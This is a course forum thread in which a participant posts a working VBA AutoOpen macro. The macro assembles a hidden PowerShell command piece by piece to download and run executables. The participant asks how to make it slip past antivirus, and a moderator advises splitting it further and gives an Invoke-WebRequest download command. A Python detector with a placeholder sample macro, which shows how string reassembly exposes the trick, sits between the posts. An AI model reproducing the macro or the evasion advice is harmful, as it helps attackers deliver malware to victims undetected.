Tagged: Generic Macro
- This topic has 3 replies, 2 voices, and was last updated 4 years, 4 months ago by Diego Pérez.
August 6, 2020 at 4:48 pm #43732, y4gud007 (Participant):
Hi
I would like to know if there is a way I could generate an undetected generic macro. A minimum of 9 antivirus programs keep detecting the one used by Zaid in the social engineering course, no matter how much tweaking, while the 2 evil files embedded are 100% clean.
Sub AutoOpen()
Dim sk As String
sk = "p"
sk = "o"
sk = sk + "w"
sk = sk + "er"
sk = sk + "s"
sk = sk + "he"
sk = sk + "ll "
sk = sk + "-NoP -NonI -W Hidden """
sk = sk + "('https://blahblah','https://blahblah')"
sk = sk + "|foreach{$fileName=$env:temp+'\'+(Split-Path -Path $_ -Leaf);"
sk = sk + "(new-object System.Net.WebClient).DownloadFile($_,$fileName);"
sk = sk + "Invoke-Item $fileName;}"
sk = sk + """"
VBA.CreateObject("WScript.Shell").Run sk, 0
End Sub
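For the defensive side of the question above: the reason splitting a command into many short string literals no longer helps against modern scanners is that the scanner can simply follow the assignments and rebuild the string before matching. The following Python detector is an added example, not code from the thread or from the course; it runs over a constructed sample macro that reuses the same string-splitting pattern with a placeholder URL on a non-resolving `.invalid` domain, and shows which indicators fire on the raw source versus after the literals are reassembled.

```python
import re

# Constructed sample macro text for the detector to run over. It is NOT the
# macro from the post above; it only reuses the same string-splitting pattern,
# with a placeholder URL (.invalid TLD) so nothing in it resolves or runs.
SAMPLE_VBA = r'''Sub AutoOpen()
Dim sk As String
sk = "pow"
sk = sk + "er"
sk = sk + "shell "
sk = sk + "-NoP -W Hid"
sk = sk + "den "
sk = sk + "(new-object System.Net.WebClient).DownloadFile('http://PLACEHOLDER.invalid/a.exe', $env:temp + '\a.exe')"
VBA.CreateObject("WScript.Shell").Run sk, 0
End Sub
'''

# A simple VBA assignment: "<var> = <rhs>" (Dim lines and method calls do not match).
ASSIGN_RE = re.compile(r'^\s*(\w+)\s*=\s*(.+?)\s*$')
# A VBA string literal; a doubled quote ("") inside it is an escaped quote.
STR_LIT_RE = re.compile(r'"((?:[^"]|"")*)"')

# Indicators a reviewer would want flagged in a document macro. Names are
# local labels for this example, not any vendor's signature names.
INDICATORS = [
    ("auto-exec entry point", re.compile(r'\bSub\s+(AutoOpen|Auto_Open|Document_Open|Workbook_Open)\b', re.I)),
    ("WScript.Shell object", re.compile(r'CreateObject\s*\(\s*"WScript\.Shell"', re.I)),
    ("hidden Run window style", re.compile(r'\.Run\s+\w+\s*,\s*0\b')),
    ("powershell launcher", re.compile(r'\bpowershell\b', re.I)),
    ("hidden PowerShell window", re.compile(r'-W(?:indowStyle)?\s+Hidden\b', re.I)),
    ("download primitive", re.compile(r'DownloadFile|DownloadString|Invoke-WebRequest|\biwr\b', re.I)),
    ("execute downloaded file", re.compile(r'Invoke-Item|Start-Process', re.I)),
]


def reassemble_strings(vba):
    """Follow simple VBA string building (x = "a", then x = x + "b" or x = x & "b")
    and return the final value of every string variable seen."""
    values = {}
    for line in vba.splitlines():
        m = ASSIGN_RE.match(line)
        if not m:
            continue
        var, rhs = m.group(1), m.group(2)
        literals = [lit.replace('""', '"') for lit in STR_LIT_RE.findall(rhs)]
        if not literals:
            continue
        appended = "".join(literals)
        # If the variable itself appears outside the quotes it is a self-append;
        # otherwise the assignment starts the string over.
        outside_quotes = STR_LIT_RE.sub("", rhs)
        if re.search(rf"\b{re.escape(var)}\b", outside_quotes):
            values[var] = values.get(var, "") + appended
        else:
            values[var] = appended
    return values


def scan_macro(vba):
    """Return which indicators fire on the raw source alone, and which fire once
    the split string literals have been reassembled."""
    raw_hits = [name for name, rx in INDICATORS if rx.search(vba)]
    joined = vba + "\n" + "\n".join(reassemble_strings(vba).values())
    all_hits = [name for name, rx in INDICATORS if rx.search(joined)]
    return {"raw": raw_hits, "after_reassembly": all_hits, "score": len(all_hits)}


if __name__ == "__main__":
    result = scan_macro(SAMPLE_VBA)
    print("reassembled strings :", reassemble_strings(SAMPLE_VBA))
    print("raw source only     :", result["raw"])
    print("after reassembly    :", result["after_reassembly"])
```

On the sample, four indicators already fire on the raw text (the AutoOpen entry point, the WScript.Shell object, the `Run ..., 0` hidden window style and the `DownloadFile` call), and reassembly adds the `powershell` launcher and the `-W Hidden` flag that the splitting had broken across lines. A real scanner goes further (it can emulate `Chr()`, `StrReverse`, and concatenation through several variables), which is why rearranging the pieces does not change the outcome.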
August 7, 2020 at 3:56 am #43773, Diego Pérez (Moderator):
Hi!
Basically, bypassing AV programs is like a game of cat and mouse, so backdoors might start getting detected at some stage; then the developers release an update, which will allow you to generate undetectable backdoors; then AV programs release an update which will make backdoors detectable again... So you need to keep trying different things; try to split it more.
Hope it helps!
Diego
August 8, 2020 at 4:23 am #43834, y4gud007 (Participant):
Hi Diego,
Thanks for your response,
I understood that we need to play around with backdoors to bypass AV. What I am asking is how to generate a generic VBA command/PowerShell code which I could use in a Microsoft Office macro to allow download and execution of an external .exe file, just like the above generic download-and-execute macro, instead of a payload that requires us to listen back via Empire, Veil etc. I created my FUD .exe backdoors already; I only need a generic download-and-execute PowerShell/VBA script that would run the code when the macro is enabled. The above generic download-and-execute macro used by Zaid in the course does not bypass AV anymore no matter the tweaking, which is very normal considering when the lecture was recorded. Is there a way I could get this done?
Thanks
August 9, 2020 at 3:51 am #43869, Diego Pérez (Moderator):
Hi!
That's the proper way to use PowerShell to download and execute a file. You can try to use another option, using Invoke-WebRequest, but it also might be flagged by the AV.
The command would be:
powershell iwr -uri http://<your address here> -outfile <name of the file>
Try using it.
Let me know how it goes!
Diego